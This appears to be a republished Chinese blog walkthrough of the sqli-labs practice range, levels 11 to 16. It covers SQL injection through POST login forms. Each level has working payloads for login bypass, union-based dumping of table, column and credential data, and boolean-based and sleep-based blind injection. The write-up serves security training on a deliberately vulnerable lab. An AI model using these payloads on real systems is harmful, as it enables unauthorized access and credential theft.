当前位置:
  1. 首页
  2. 互联网
  3. 正文
本文介绍: SQL注入sqlilabs靶场详解(less11-less17)

目录

less-11

less-12

less-13

less-14

less-15

less-16

提交参数动态参数存在url存在post表单中 于是在表单中进行注入测试

先看一看这种提交数据的关卡输入提交后会有什么反应

uname=admin&passwd=admin&submit=Submit

输出 username=admin password=admin

uname=123&passwd=123&submit=Submit

输出

uname=1234&passwd=123456&submit=Submit

输出

可以判定 这种关卡的原理就是 输出账号密码 服务器使用sql语言根据提交的账号以及密码作为条件数据库查找相关数据 如果查询出来了返回数据表存放账号密码 也就是我们输入账号密码 并且显示成功登录

题型类似

这种题就是给你一个登录的条件 (因为你登录账号密码参数会被服务器使用sql语言数据库中进行操作 无论什么操作 他都需要获取你的参数到数据库中进行执行,只要是执行了 并且没有参数进行过滤 那就很容易造成 sql注入

自己账号密码是已知的  假设这是一个网站通过自己账号密码登录上去了 你发现你的账号密码参数位置存在注入点  

每关的注入方式采用经典方式 

只要有报错输出页面的都可以使用报错注入 特别简单不给演示 

请看 >> SQL-报错注入

less-11

判断注入

uname=admin‘ 成功登录

uname=admin‘  报错  to use nearadmin

uname=admin‘ and ‘1’=’1′# 成功

这一点也就是简单的密码绕过 

后端是根据用户名和密码同时作为条件去查询并输出

但是使用了#直接把密码的值给注释了 也就是相当于 只输入一个账号就能查询到 该账号账号和密码

uname=admin‘# 成功登录

uname=admin‘ and ‘1’=’2′# 无输出

从而判断出该注入点为 POST字符型注入点

注意

post表单注入的时 构造sql语句注释符最好使用# 否则容易出错 — –+

注入操作

# 判断当前表的列数 得出当前表有3列
#查看显示uname=admin' and 1=1 order by 1 # 成功
uname=admin' and 1=1 order by 2 # 成功
uname=admin' and 1=1 order by 3 # 报错
在这解释一下同一个数据库的数据表 为什么之前都是4列报错 这就3列报错了 
因为数据表的确有3列 之前不报错原因是 前几关服务器的查询语句select * from
但是在这关开始 服务器的查询语句select usernamepassword from 
#查看显示位 得知查找结果全部显示出来了 显示位为1,2号
uname=admin' and 1=2 union select 1,2# 
#查看当前数据库
uname=admisn' and 1=2 union select database(),2#  在1号位的位置输出当前数据库名
uname=admi11n' and 1=2 union select database(),2# 这个也能看出来根本不需要正确的账号也能进行sql注入
#查看当前数据库所有表 
uname=adsssmin' and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),2#
#查看某表的字段名
uname=admssin' and 1=2 union select (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),2#
#查看字段值
uname=admsadin' and 1=2 union select (select concat_ws(',',id,username,password) from security.users limit 0,1),2#

less-12

判断注入点

uname=admin 成功

uname=admin’ 无输出显示登录失败

uname=admin’asdasdzxc# 无输出 并显示登录失败

uname=admin and 1=1# 无输出 并显示登录失败

通过以上 大概就能判断出这个一个字符型注入点  但是对参数处理并不是使用单引号 

uname=admin 报错to use near ‘admin”)

通过这一点 确定这是一个字符注入点 对参数的处理方式双引号 外加一个括号

服务器参数的形式为 (“$id“)

注入操作

# 判断当前表的列数 得出当前表有3列
#查看显示位
uname=admin") and 1=1 order by 1 # 成功
uname=admin") and 1=1 order by 2 # 成功
uname=admin") and 1=1 order by 3 # 报错
在这解释一下同一个数据库的数据表 为什么之前都是4列报错 这就3列报错了 
因为数据表的确有3列 之前不报错的原因是 前几关服务器的查询语句是select * from
但是在这关开始 服务器的查询语句是 select usernamepassword from 
#查看显示位 得知查找结果全部显示出来了 显示位为1,2号
uname=admssin") and 1=2 union select 1,2#
#查看当前数据库
uname=admdasdain") and 1=2 union select database(),2#  在1号位的位置输出了当前数据库名
#查看当前数据库所有表 
uname=adzcxzsmin") and 1=2 union select (select group_concat(table_name) from information_schema.tables where table_schema='security'),2#
#查看某表的字段名
uname=adasdamin") and 1=2 union select (select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),2#
#查看字段值
uname=admin") and 1=2 union select (select concat_ws(',',id,username,password) from security.users limit 0,1),2#

less-13

判断注入点

uname=admin 无输出 但显示登录成功

uname=123213123 无输出 登录失败

通过以上可以推测出 不显示任何信息值 只告诉你是否登录成功 只能采用布尔注入的方式

登陆成功:服务器SQL语句查询到结果 判定查询为TRUE状态

登录失败:服务器SQL语句没有查询到结果 判定查询为FALSE状态

uname=admin’ 报错:to use near ‘admin’)

通过报错推测出 该注入点为POST字符服务器对参数的处理形式为使用单引号加上括号

服务器参数的形式为 (‘$id‘)

以上推断出该关卡是用布尔盲注的方法进行注入

我一开始采用的是盲注的方式 最后发现这题是布尔注入的方式 两种方式都可以

注入操作

盲注

#推断数据库长度
uname=admin') and if(length(database())>0,sleep(2),1)# 有延时
为什么会显示登录失败 因为sleep返回值是0
#推断当前数据库
uname=admin') and if (ascii(substr(database(),1,1))>0,sleep(2),1)# 有延时
#推断当前数据库所有表 
uname=admin') and if (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>0,sleep(2),1)# 有延时
#查看某表的字段名
uname=admin') and if (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>0,sleep(2),1)# 有延时
#查看字段值
uname=admin') and if (ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>67,sleep(2),1)#

布尔注入

#推断数据库长度
uname=admin') and length(database())>0#  显示成功
uname=admin') and length(database())>10# 显示失败
#推断当前数据库 
uname=admin') and ascii(substr(database(),1,1))>0# 显示登录成功
uname=admin') and ascii(substr(database(),1,1))>1000# 显示登录失败
#推断当前数据库所有表 
uname=admin') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>0#     显示登录成功
uname=admin') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10000# 显示登录失败
#查看某表的字段名
uname=admin') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>0# 显示登录成功
uname=admin') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>1000# 显示登录失败
#查看字段值
uname=admin') and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>68# 显示登录失败
uname=admin') and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>67# 显示登录成功

less-14

判断注入点(这是最详细的判断过程

uname=admin 无返回结果 登录成功

uname=admin’ 无返回结果 登录失败

第二个语句无报错 可能有两种情况

服务器不让错误信息输出出来  参数可能整型也有可能字符型(形式为单引号

②参数是字符型的 服务器对参数的处理方式没有使用引号

uname=admin’ # 无返回结果 登录失败

推断(这个推断没什么用)只是排除了 服务器不让错误信息输出出来 参数是单引号字符

参数如果是字符 没有使用单引号

参数如果是整型 服务器不让错误信息显示出来

继续尝试

假定参数为整型

uname=admin and 1=1 无任何显示 登录失败

确定参数不为整型

只有一种结果

参数是字符 没有使用单引号

于是

uname=admin 报错:‘admin”

确定 服务区对参数的处理双引号

uname=admin” and 1=1 # 成功

uname=admin” and 1=2 # 失败

使用布尔注入的方式

注入操作

#推断数据库长度
uname=admin" and length(database())>0#  显示成功
uname=admin" and length(database())>10# 显示失败
#推断当前数据库 
uname=admin" and ascii(substr(database(),1,1))>0# 显示登录成功
uname=admin" and ascii(substr(database(),1,1))>1000# 显示登录失败
#推断当前数据库所有表 
uname=admin" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>0#     显示登录成功
uname=admin" and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10000# 显示登录失败
#查看某表的字段名
uname=admin" and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>0# 显示登录成功
uname=admin" and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>1000# 显示登录失败
#查看字段值
uname=admin" and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>68# 显示登录失败
uname=admin" and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>67# 显示登录成功

less-15

判断注入点

uname=admin 无返回结果 登录成功

uname=qwe123    无返回结果 登录失败

uname=admin’ 无返回结果 登录失败

uname=admin and 1=1 无返回结果 登录失败

uname=admin’ and ‘1’=’1 无返回结果 登录成功、

通过以上推理可以判定

①单引号字符型注入

②对错误不输出

③使用布尔型注入

注入操作

#推断数据库长度
uname=admin' and length(database())>0#  显示成功
uname=admin' and length(database())>10# 显示失败
#推断当前数据库 
uname=admin' and ascii(substr(database(),1,1))>0# 显示登录成功
uname=admin' and ascii(substr(database(),1,1))>1000# 显示登录失败
#推断当前数据库所有表 
uname=admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>0#     显示登录成功
uname=admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10000# 显示登录失败
#查看某表的字段名
uname=admin' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>0# 显示登录成功
uname=admin' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>1000# 显示登录失败
#查看字段值
uname=admin' and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>68# 显示登录失败
uname=admin' and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>67# 显示登录成功

less-16

判断注入点

uname=admin 无返回结果 登录成功

uname=12313123 无返回结果 登录失败

uname=admin’ 无返回结果 登录失败

uname=admin 无返回结果 登录失败

uname=admin and 1=1 无返回结果 登录失败

uname=admin’ and ‘1’=’1 无返回结果 登录失败

通过以上判断出 

①对错误不输出

②不是整型也不是单引号形式的字符型注入点

③只能是以其他形式的字符注入点

uname=admin”) # 登录成功

以上推断出这是一个布尔型注入点

注入操作

#推断数据库长度
uname=admin") and length(database())>0#  显示成功
uname=admin") and length(database())>10# 显示失败
#推断当前数据库 
uname=admin") and ascii(substr(database(),1,1))>0# 显示登录成功
uname=admin") and ascii(substr(database(),1,1))>1000# 显示登录失败
#推断当前数据库所有表 
uname=admin") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>0#     显示登录成功
uname=admin") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10000# 显示登录失败
#查看某表的字段名
uname=admin") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>0# 显示登录成功
uname=admin") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>1000# 显示登录失败
#查看字段值
uname=admin") and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>68# 显示登录失败
uname=admin") and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))>67# 显示登录成功

前十六关不需要分析代码 就是最基础的

less1-less10 为GET基础型注入 

less11-less16 为POST基础性注入 

前十六关代码每关的区别

①服务器对参数的处理方式

②对语句查询出的结果进行处理  可能是输出到页面 可能会给你提示 可能不输出 都是最基础的if else语句 不需要分析

注意点

如果采用联合查询的方式 username的值瞎写都行

如果使用盲注的方式 username必须是准确值

原文地址:https://blog.csdn.net/m0_72125469/article/details/134615971

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任

如若转载,请注明出处:http://www.7code.cn/show_26844.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除

上一篇 一、服务器准备
下一篇 基于ASP.NET MVC技术的图书管理系统的设计与实现

相关文章

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注

插入图片
浏览器会保存昵称、邮箱和网站cookies信息,下次评论时使用。